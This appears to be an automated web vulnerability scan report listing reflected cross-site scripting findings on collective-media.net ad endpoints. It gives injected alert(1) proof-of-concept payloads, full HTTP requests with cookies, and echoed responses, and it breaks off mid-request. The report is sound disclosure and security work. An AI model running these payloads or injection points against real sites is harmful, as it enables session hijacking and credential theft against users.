Date: Mon, 09 May 2011 14:01:07 GMT
Expires: Mon, 09 May 2011 14:01:07 GMT
DCLK_imp: v7;x;44306;0-0;0;60840454;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;secure=c5c12
7e45a7ac1ac;~cs=b:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/a;44306;0-0;0;60840454;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...
3. Cross-site scripting (reflected)  previous  next
There are 147 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 950fa'-alert(1)-'706392fff78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.tribune950fa'-alert(1)-'706392fff78/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;ord=5044004? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Date: Mon, 09 May 2011 13:59:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:37 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.tribune950fa'-alert(1)-'706392fff78/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
3.2. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d0da'-alert(1)-'85703a87340 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.tribune/uscell_ldev_300x600_053112d0da'-alert(1)-'85703a87340;tgt=brand;sz=300x600;ord=5044004? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Date: Mon, 09 May 2011 13:59:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:37 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_053112d0da'-alert(1)-'85703a87340;tgt=brand;sz=300x600;net=cm;ord=5044004;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
3.3. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c672b'-alert(1)-'978317c40a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;ord=5044004?&c672b'-alert(1)-'978317c40a6=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 475
Date: Mon, 09 May 2011 13:59:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:37 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004?&c672b'-alert(1)-'978317c40a6=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
3.4. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [tgt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of the tgt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4594'-alert(1)-'6008b1110f2 was submitted in the tgt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;ord=5044004?d4594'-alert(1)-'6008b1110f2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 472
Date: Mon, 09 May 2011 13:59:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:37 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004?d4594'-alert(1)-'6008b1110f2;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
3.5. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/be_news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13b5f'-alert(1)-'1057096941b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.617013b5f'-alert(1)-'1057096941b/be_news;sz=300x250;ord=949612198? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc; qcdp=1; exdp=1; ibvr=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Mon, 09 May 2011 14:00:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 14:00:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.617013b5f'-alert(1)-'1057096941b/be_news;sz=300x250;net=q1;ord=949612198;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
3.6. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/be_news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload baa51'-alert(1)-'50324ee319c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/be_newsbaa51'-alert(1)-'50324ee319c;sz=300x250;ord=949612198? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc; qcdp=1; exdp=1; ibvr=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:24 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 14:00:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/be_newsbaa51'-alert(1)-'50324ee319c;sz=300x250;net=q1;ord=949612198;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
3.7. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/be_news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbffc'-alert(1)-'020bebcbb48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/be_news;sz=300x250;ord=949612198?&fbffc'-alert(1)-'020bebcbb48=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc; qcdp=1; exdp=1; ibvr=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Date: Mon, 09 May 2011 14:00:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 14:00:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news;sz=300x250;net=q1;ord=949612198?&fbffc'-alert(1)-'020bebcbb48=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
3.8. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/be_news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85f88'-alert(1)-'6ad97540a80 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/be_news;sz=300x250;ord=949612198?85f88'-alert(1)-'6ad97540a80 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc; qcdp=1; exdp=1; ibvr=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 09 May 2011 14:00:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 14:00:23 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news;sz=300x250;net=q1;ord=949612198?85f88'-alert(1)-'6ad97540a80;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
3.9. http://a.collective-media.net/adj/q1.q.gc.6170/news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 767f8'-alert(1)-'f18e09670b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170767f8'-alert(1)-'f18e09670b4/news;sz=728x90;ord=949588501? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc; apnx=1; qcms=1; nadp=1; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Mon, 09 May 2011 13:59:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:55 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170767f8'-alert(1)-'f18e09670b4/news;sz=728x90;net=q1;ord=949588501;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
3.10. http://a.collective-media.net/adj/q1.q.gc.6170/news [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95e8d'-alert(1)-'5badbfc0af3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/news95e8d'-alert(1)-'5badbfc0af3;sz=728x90;ord=949588501? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc; apnx=1; qcms=1; nadp=1; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Mon, 09 May 2011 13:59:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:56 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/news95e8d'-alert(1)-'5badbfc0af3;sz=728x90;net=q1;ord=949588501;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
3.11. http://a.collective-media.net/adj/q1.q.gc.6170/news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8522d'-alert(1)-'9242ac13858 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/news;sz=728x90;ord=949588501?&8522d'-alert(1)-'9242ac13858=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc; apnx=1; qcms=1; nadp=1; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:55 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:55 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/news;sz=728x90;net=q1;ord=949588501?&8522d'-alert(1)-'9242ac13858=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
3.12. http://a.collective-media.net/adj/q1.q.gc.6170/news [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d6f8'-alert(1)-'b758fa577ec was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/news;sz=728x90;ord=949588501?6d6f8'-alert(1)-'b758fa577ec HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
